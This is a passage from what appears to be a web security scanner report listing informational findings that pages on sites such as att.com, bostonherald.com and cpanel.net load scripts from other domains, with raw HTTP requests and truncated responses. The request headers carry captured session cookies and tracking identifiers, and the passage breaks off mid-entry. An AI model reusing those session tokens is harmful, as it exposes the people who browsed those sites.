Date: Fri, 16 Sep 2011 19:48:47 GMT
Server: Apache
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 19654

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script type="text/javascr
...[SNIP]...
</script>
<script language="JavaScript" src="http://j.maxmind.com/app/geoip.js"></script>
...[SNIP]...

18.130. http://www.alepo.com/wifi.shtml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.alepo.com
Path:   /wifi.shtml

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /wifi.shtml HTTP/1.1
Host: www.alepo.com
Proxy-Connection: keep-alive
Referer: http://www.alepo.com/radius-server.shtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=18704489.631393116.1316220585.1316220585.1316220585.1; __utmb=18704489.1.10.1316220585; __utmc=18704489; __utmz=18704489.1316220585.1.1.utmcsr=radius-server.com|utmccn=(referral)|utmcmd=referral|utmcct=/; alepo_cookie=http%3A//www.radius-server.com/%23%23%23%23undefined%23%23%23%239%5C16%5C111%23%23%23%23%20%23%23%23%23%23%23%23%23-5%3A0

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:48:52 GMT
Server: Apache
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 20910

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script type="text/javascr
...[SNIP]...
</script>
<script language="JavaScript" src="http://j.maxmind.com/app/geoip.js"></script>
...[SNIP]...

18.131. http://www.aradial.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aradial.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: www.aradial.com
Proxy-Connection: keep-alive
Referer: http://blekko.com/ws/radius+server
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:44:31 GMT
Server: Apache
Last-Modified: Wed, 02 Feb 2011 07:01:21 GMT
ETag: "fca81c5-4378-4d490141"
Accept-Ranges: bytes
Content-Length: 17272
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<html>

<head>
<TITLE>Radius Server software and AAA RADIUS billing systems - Aradial</TITLE>
<meta name="description" content="RADI
...[SNIP]...
</center>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

18.132. http://www.att.com/u-verse/availability/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.att.com
Path:   /u-verse/availability/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /u-verse/availability/ HTTP/1.1
Host: www.att.com
Proxy-Connection: keep-alive
Referer: http://attuverseoffers.com/tv_hsi_bundles/index.php?sendVar=20State_49PromoOffer&source=ECbc0000000WIP00O&fbid=9Lm6uVSxV_u
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cust_type=new; browserid=A001722225240; svariants=NA; DL3K=0; ECOM_GTM=owbth_NA_NA_NA_ostdbth; __utma=52846072.845099683.1315325061.1315325061.1315325061.1; __utmz=52846072.1315325061.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); d4421046-efa2-4b8f-86b0-7cdce9b8067a=%7B%22parent_id%22%3A%22%22%2C%22referrer%22%3A%22%22%2C%22id%22%3A%22YRv1CNCXi5e%22%2C%22wom%22%3Afalse%2C%22entry_point%22%3A%22http%3A%2F%2Fwww.att.com%2F%22%2C%22url_tag%22%3A%22NOMTAG%22%7D; bn_u=6923713484570324388

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 125924
Date: Sat, 17 Sep 2011 01:51:52 GMT
Connection: close
Set-Cookie: TLTHID=9CE93778E0CF10E023F7DBFC78A4493E; Path=/; Domain=.att.com
Set-Cookie: B2CSESSIONID=DGhlTz9XhJykB9!-1935813224; path=/; HttpOnly
Set-Cookie: DYN_USER_ID=4200818379; path=/
Set-Cookie: DYN_USER_CONFIRM=a4f794fa32265f84a93d1ee3c2b94f36; path=/


                                                               
...[SNIP]...
</script>
           
           
                                                                                           <script type="text/javascript" src="http://static.meteorsolutions.com/metsol.js"></script>
...[SNIP]...

18.133. http://www.bostonherald.com/mobile/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /mobile/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /mobile/ HTTP/1.1
Host: www.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/mobile/info.bg
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=Mhd7ak5wnrsADfhS; __qca=P0-565564501-1316021626456; bhfont=12; bhpopup=on; __utma=1.249425585.1316021953.1316021953.1316239295.2; __utmb=1.1.10.1316239295; __utmc=1; __utmz=1.1316239295.2.2.utmcsr=scores.heraldinteractive.com|utmccn=(referral)|utmcmd=referral|utmcct=/merge/tsnform.aspx; RMFD=011R4jGHO201yed8|O2021J3t|O3021J78|O2021J7A|O2021J7F|O10226KY|O20226Kk; __utma=235728274.611537932.1316021623.1316021623.1316239291.2; __utmb=235728274.42.10.1316239294; __utmc=235728274; __utmz=235728274.1316021623.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:50:34 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 14159
Connection: close


<!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.0//EN" "http://www.wapforum.org/DTD/xhtml-mobile10.dtd">
<html>
<head>

<!-- // mobile.tmpl // -->

<title> Mobile - BostonHerald.
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.134. http://www.bostonherald.com/mobile/info.bg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /mobile/info.bg

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /mobile/info.bg HTTP/1.1
Host: www.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/news/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=Mhd7ak5wnrsADfhS; __qca=P0-565564501-1316021626456; bhfont=12; bhpopup=on; __utma=1.249425585.1316021953.1316021953.1316239295.2; __utmb=1.1.10.1316239295; __utmc=1; __utmz=1.1316239295.2.2.utmcsr=scores.heraldinteractive.com|utmccn=(referral)|utmcmd=referral|utmcct=/merge/tsnform.aspx; RMFD=011R4jGHO201yed8|O2021J3t|O3021J78|O2021J7A|O2021J7F|O10226KY|O20226Kk; __utma=235728274.611537932.1316021623.1316021623.1316239291.2; __utmb=235728274.41.10.1316239294; __utmc=235728274; __utmz=235728274.1316021623.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:49:52 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 29845
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
<title>BostonHerald.com Mobile
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://cache.heraldinteractive.com/js/scriptaculous/prototype.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/scriptaculous.js?=load=effects" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://bh.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
<!-- Finance -->
<script type='text/javascript' src='http://www.4info.net/js/auto_jump.js'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.4info.net/alert/ads/fastTrackAlerts.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.4info.net/alert/ads/fastTrackAlerts.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.135. http://www.bostonherald.com/mobile/view.bg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /mobile/view.bg

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /mobile/view.bg?articleid=1366388 HTTP/1.1
Host: www.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/mobile/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=Mhd7ak5wnrsADfhS; __qca=P0-565564501-1316021626456; bhfont=12; bhpopup=on; __utma=1.249425585.1316021953.1316021953.1316239295.2; __utmb=1.1.10.1316239295; __utmc=1; __utmz=1.1316239295.2.2.utmcsr=scores.heraldinteractive.com|utmccn=(referral)|utmcmd=referral|utmcct=/merge/tsnform.aspx; RMFD=011R4jGHO201yed8|O2021J3t|O3021J78|O2021J7A|O2021J7F|O10226KY|O20226Kk; __utma=235728274.611537932.1316021623.1316021623.1316239291.2; __utmb=235728274.44.10.1316239294; __utmc=235728274; __utmz=235728274.1316021623.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:50:39 GMT
Server: Apache
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 13852
Connection: close


<!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.0//EN" "http://www.wapforum.org/DTD/xhtml-mobile10.dtd">
<html>
<head>

<!-- // mobile.tmpl // -->

<title> Mobile - BostonHerald.
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.136. http://www.bostonherald.com/news/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /news/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/ HTTP/1.1
Host: www.bostonherald.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=Mhd7ak5wnrsADfhS; __qca=P0-565564501-1316021626456; bhfont=12; __utma=235728274.611537932.1316021623.1316021623.1316021623.1; __utmz=235728274.1316021623.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RMFD=011R3od8O201yed8|Q1021J6Q|O1021J6R|O1021J6j|O2021J73|P3021J78|Q1021J7A|Q1021J7F|Q1021J7N|O10226Kk; __utma=1.249425585.1316021953.1316021953.1316021953.1; __utmz=1.1316021953.1.1.utmcsr=scores.heraldinteractive.com|utmccn=(referral)|utmcmd=referral|utmcct=/merge/tsnform.aspx

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:09:13 GMT
Server: Apache
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 101426
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <!-- // section_beta.tmpl // --
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...
</script>
<SCRIPT language="JavaScript" src="http://q1digital.checkm8.com/adam/cm8adam_1_call.js"></SCRIPT>
...[SNIP]...

18.137. http://www.bradsdeals.com/dealsoftheday/subscribe/b  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bradsdeals.com
Path:   /dealsoftheday/subscribe/b

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /dealsoftheday/subscribe/b?tid=306656&s=adcom|display|comscore55-300redmixr-b&utm_source=adcom&utm_medium=display&utm_content=300redmixr-b&utm_campaign=comscore55 HTTP/1.1
Host: www.bradsdeals.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000007248807&sd=2x300x250&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=72295833&rk1=61125476&rk2=1316239535.083&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Set-Cookie: TID=306656;domain=.bradsdeals.com;path=/
X-Powered-By: ASP.NET
Date: Sat, 17 Sep 2011 01:34:39 GMT
Content-Length: 23937

<!DOCTYPE html>

<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
   <meta charset="utf-8">

   <title>Brad's Deals of the Day</title>
   <meta name="description" content="Subscribe t
...[SNIP]...
<!-- Optimizely Testing Code -->    
   <script src="//cdn.optimizely.com/js/5830034.js"></script>
...[SNIP]...
</script> <script type='text/javascript' src='http://static.fmpub.net/site/bradsdeals'></script>
...[SNIP]...

18.138. http://www.courier-mta.org/imap/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.courier-mta.org
Path:   /imap/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /imap/ HTTP/1.1
Host: www.courier-mta.org
Proxy-Connection: keep-alive
Referer: http://duckduckgo.com/?q=imap+server
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:42:14 GMT
Server: Apache/1.3.33 (Unix) mod_perl/1.29 PHP/4.3.10
X-Powered-By: PHP/4.3.10
Content-Type: text/html
Content-Length: 6034

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=us-ascii"/>

<title>The Courier IMAP server</title>
<link rel="stylesheet" href="st
...[SNIP]...
</script><script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...

18.139. http://www.courier-mta.org/imap/header.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.courier-mta.org
Path:   /imap/header.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /imap/header.html HTTP/1.1
Host: www.courier-mta.org
Proxy-Connection: keep-alive
Referer: http://www.courier-mta.org/imap/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:42:15 GMT
Server: Apache/1.3.33 (Unix) mod_perl/1.29 PHP/4.3.10
Last-Modified: Wed, 06 Jul 2011 12:43:18 GMT
ETag: "1666e6d-b8e-4e145866"
Accept-Ranges: bytes
Content-Length: 2958
Content-Type: text/html

<?xml version="1.0"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script type="text/javascript" src=
"https://apis.google.com/js/plusone.js">

</script>
...[SNIP]...

18.140. http://www.cpanel.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cpanel.net
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.cpanel.net
Proxy-Connection: keep-alive
Referer: http://forums.cpanel.net/calendar.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bb_sessionhash=7b42b50b859ac7069bd0783e6f7218a5; bb_lastvisit=1316202173; bb_lastactivity=0; bb_calendar=2dcb47838013fab34d7be4fb7b6665f066c82f07a-3-%7Bs-7-.calyear._i-2011_s-8-.calmonth._i-9_s-8-.calview1._s-12-.displaymonth._%7D; __utma=21786852.1717603496.1316220231.1316220231.1316220231.1; __utmb=21786852.5.9.1316220698102; __utmc=21786852; __utmz=21786852.1316220231.1.1.utmcsr=duckduckgo.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmv=21786852.usergroup-1-Unregistered%20%2F%20Not%20Logged%20In

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:50:43 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e
Accept-Ranges: bytes
Cache-Control: max-age=300
Expires: Fri, 16 Sep 2011 19:55:43 GMT
Vary: Accept-Encoding
Content-Length: 29005
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<me
...[SNIP]...
</p>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
...[SNIP]...
<!-- Woopra Code Start -->
<script type="text/javascript" src="//static.woopra.com/js/woopra.v2.js"></script>
...[SNIP]...

18.141. http://www.desktone.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.desktone.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.desktone.com
Proxy-Connection: keep-alive
Referer: http://info.desktone.com/gaw.hosted.virtual.desktop.free.trial.html?_kk=VDI&_kt=31d1a2bd-f653-42ac-b143-8a094cde83dc&gclid=COryhqeCo6sCFTEaQgodYAJH4g
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _mkto_trk=id:070-XIP-593&token:_mch-desktone.com-1316237201401-57160

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:26:04 GMT
Server: Apache/2.2.20 (FreeBSD) mod_ssl/2.2.20 OpenSSL/0.9.8n DAV/2 PHP/5.3.8 with Suhosin-Patch SVN/1.6.17
X-Powered-By: PHP/5.3.8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 12480
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
       <meta name="
...[SNIP]...
</script>
                               <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=desktone"></script>
...[SNIP]...
</BODY> tag -->
       <script type="text/javascript" src="https://lct.salesforce.com/sfga.js"></script>
...[SNIP]...
<!-- Start of Marketo Code -->
       <script src="http://munchkin.marketo.net/munchkin.js" type="text/javascript"></script>
...[SNIP]...

18.142. http://www.disenter.com/disenter.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.disenter.com
Path:   /disenter.css

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /disenter.css HTTP/1.1
Host: www.disenter.com
Proxy-Connection: keep-alive
Referer: http://www.disenter.com/search.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Fri, 16 Sep 2011 19:33:35 GMT
Server: Apache
Accept-Ranges: bytes
Content-Length: 3443
Connection: close
Content-Type: text/html

<HTML>

<HEAD><TITLE>404 - File Not Found</TITLE></HEAD>

<BODY BGCOLOR="#FFFFFF">

<CENTER>

<BR><BR>
<TABLE BORDER=1 WIDTH=416 CELLSPACING=0>
<TR>
<TD BGCOLOR=#6666CC>
<TABLE>
<TR>
   
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

18.143. http://www.disenter.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.disenter.com
Path:   /favicon.ico

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /favicon.ico HTTP/1.1
Host: www.disenter.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Fri, 16 Sep 2011 19:31:45 GMT
Server: Apache
Accept-Ranges: bytes
Content-Length: 3443
Connection: close
Content-Type: text/html

<HTML>

<HEAD><TITLE>404 - File Not Found</TITLE></HEAD>

<BODY BGCOLOR="#FFFFFF">

<CENTER>

<BR><BR>
<TABLE BORDER=1 WIDTH=416 CELLSPACING=0>
<TR>
<TD BGCOLOR=#6666CC>
<TABLE>
<TR>
   
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

18.144. http://www.elfqrin.com/hacklab/pages/nntpserv.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.elfqrin.com
Path:   /hacklab/pages/nntpserv.php

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /hacklab/pages/nntpserv.php HTTP/1.1
Host: www.elfqrin.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=nntp+server
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:25:02 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.8-0.dotdeb.1 with Suhosin-Patch
X-Powered-By: PHP/5.2.8-0.dotdeb.1
Set-Cookie: edge_language=en; expires=Sun, 16-Oct-2011 19:25:02 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: edge_theme=default
Content-Type: text/html
Content-Length: 9262

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><P><CENTER>
<style type="text/css">
.adHeadline {font: bold 11pt Arial; text-decoration: underline; color: #3333FF;}
.adTe
...[SNIP]...
</style>
<script type="text/javascript" src="http://2.adbrite.com/mb/text_group.php?sid=10489&amp;col=4&amp;br=1&amp;dk=726567697374657220646f6d61696e5f35"></script>
...[SNIP]...
<BR>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

18.145. http://www.facebook.com/plugins/activity.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/activity.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /plugins/activity.php?site=abc.go.com&width=274&height=406&header=false&colorscheme=light&font=tahoma&recommendations=true HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://beta.abc.go.com/shows/charlies-angels
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM; lsd=JJyyQ

Response

HTTP/1.1 200 OK
